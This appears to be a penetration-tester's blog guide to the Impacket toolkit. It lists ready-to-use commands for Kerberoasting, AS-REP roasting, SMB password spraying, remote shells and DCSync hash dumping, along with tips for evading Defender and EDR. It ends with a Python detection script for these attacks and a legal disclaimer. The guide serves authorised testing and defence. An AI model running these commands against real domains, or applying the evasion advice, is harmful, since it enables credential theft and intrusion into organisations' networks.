Impacket — Install, Use, Optimise (2026)

Manish Garg · Associate of (ISC)² · RingSafe
Apr 29, 2026
2 min read

Python library for the SMB, Kerberos and MSRPC protocols — the Swiss Army knife of Active Directory post-exploitation.

Use case: Active Directory
Difficulty: Advanced
Homepage: https://github.com/fortra/impacket

Installation

Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.

pipx (recommended)

pipx install impacket

Linux (apt)

sudo apt install impacket-scripts

Source

git clone https://github.com/fortra/impacket && cd impacket && pip install .

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

Kerberoast (extract service tickets)

GetUserSPNs.py corp.local/user:pass -dc-ip 10.0.0.1 -request

AS-REP roast (preauth disabled users)

GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 10.0.0.1

Password spray over SMB

crackmapexec smb 10.0.0.0/24 -u users.txt -p Spring2026!

PSExec-like SMB shell

psexec.py corp.local/user:pass@10.0.0.1

WMI shell (stealthier)

wmiexec.py corp.local/user:pass@10.0.0.1

DCSync via secretsdump

secretsdump.py corp.local/user:pass@10.0.0.1 -just-dc

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

  • secretsdump.py -just-dc-ntlm is faster than a full DCSync — it skips the SAM and LSA secrets dump and pulls only the NTLM hashes, not the Kerberos keys.
  • -target-ip when DNS resolution fails — saves about 30 s per host on big sweeps.
  • -debug shows the wire-level protocol — invaluable for diagnosing Kerberos errors.
  • All scripts support -k -no-pass for ticket-based auth (after export KRB5CCNAME=/tmp/admin.ccache).
  • -codec utf-8 for non-English domains (Indian companies with देवनागरी / regional charset entries).

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

  • psexec.py drops a service binary on disk — Defender catches it. Use wmiexec.py or smbexec.py for a fileless alternative.
  • Kerberos clock skew: the client clock must be within 5 minutes of the DC's. Run sudo ntpdate dc.corp.local first.
  • -just-dc with insufficient privileges fails silently — confirm the account holds DCSync rights (Replicating Directory Changes) before blaming the tool.
  • GetNPUsers performs its LDAP searches loudly and then fires a burst of AS-REQs — Splunk/QRadar can alert on the AS-REP volume.
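The detection side of the last two pitfalls, as an added example that is not from the post: the event lines below are constructed in a simplified key=value form (field names, values and thresholds are assumptions, not a real SIEM schema) and the code flags the two patterns a SIEM rule would look for: a burst of TGT requests for accounts with pre-authentication disabled (event 4768, preauth=0, what GetNPUsers produces) and one account requesting RC4 service tickets (event 4769, etype 0x17) for many SPNs (what GetUserSPNs -request produces).

```python
import re
from collections import defaultdict

# Constructed sample events (not real logs): 4768 = TGT request, 4769 = service ticket request.
# preauth=0 means no pre-authentication was used; etype 0x17 is RC4-HMAC, 0x12 is AES256.
SAMPLE_EVENTS = """\
id=4768 src=10.0.0.50 user=alice preauth=2 etype=0x12
id=4768 src=10.0.0.50 user=bob preauth=2 etype=0x12
id=4768 src=10.0.0.99 user=svc_old preauth=0 etype=0x17
id=4768 src=10.0.0.99 user=svc_legacy preauth=0 etype=0x17
id=4768 src=10.0.0.99 user=backup preauth=0 etype=0x17
id=4769 src=10.0.0.50 user=alice service=CIFS/fs01 etype=0x12
id=4769 src=10.0.0.99 user=carol service=MSSQLSvc/db01 etype=0x17
id=4769 src=10.0.0.99 user=carol service=HTTP/web01 etype=0x17
id=4769 src=10.0.0.99 user=carol service=MSSQLSvc/db02 etype=0x17
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Turn each non-empty key=value line into a dict (assumed log format)."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]


def detect_asrep_roast(events, threshold=3):
    """Source IPs that requested TGTs without pre-auth for >= threshold distinct accounts."""
    hits = defaultdict(set)
    for e in events:
        if e.get("id") == "4768" and e.get("preauth") == "0":
            hits[e["src"]].add(e["user"])
    return {src: sorted(users) for src, users in hits.items() if len(users) >= threshold}


def detect_kerberoast(events, threshold=3):
    """(src, user) pairs that pulled RC4 service tickets for >= threshold distinct SPNs."""
    hits = defaultdict(set)
    for e in events:
        if e.get("id") == "4769" and e.get("etype") == "0x17":
            hits[(e["src"], e["user"])].add(e["service"])
    return {key: sorted(spns) for key, spns in hits.items() if len(spns) >= threshold}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("AS-REP roast candidates:", detect_asrep_roast(evs))
    print("Kerberoast candidates:", detect_kerberoast(evs))
```

Tune the thresholds to the baseline of your own domain: a handful of legacy services legitimately still use RC4, so the signal is the number of distinct SPNs or accounts per source in a short window, not a single event.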

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

  • NetExec (formerly CrackMapExec) — wraps Impacket for bulk operations.
  • Rubeus — Windows-native Kerberos tooling.
  • BloodHound.py — the Python collector also uses Impacket internally.

India context and engagement notes

For Indian banking AD engagements (RBI/SEBI scope): Impacket’s Kerberoast + secretsdump is the canonical attack chain that auditors expect to see referenced in pen-test reports. Run from a Linux jump-box (Kali) — keeps tool execution off Windows endpoints where EDR catches everything.


⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.
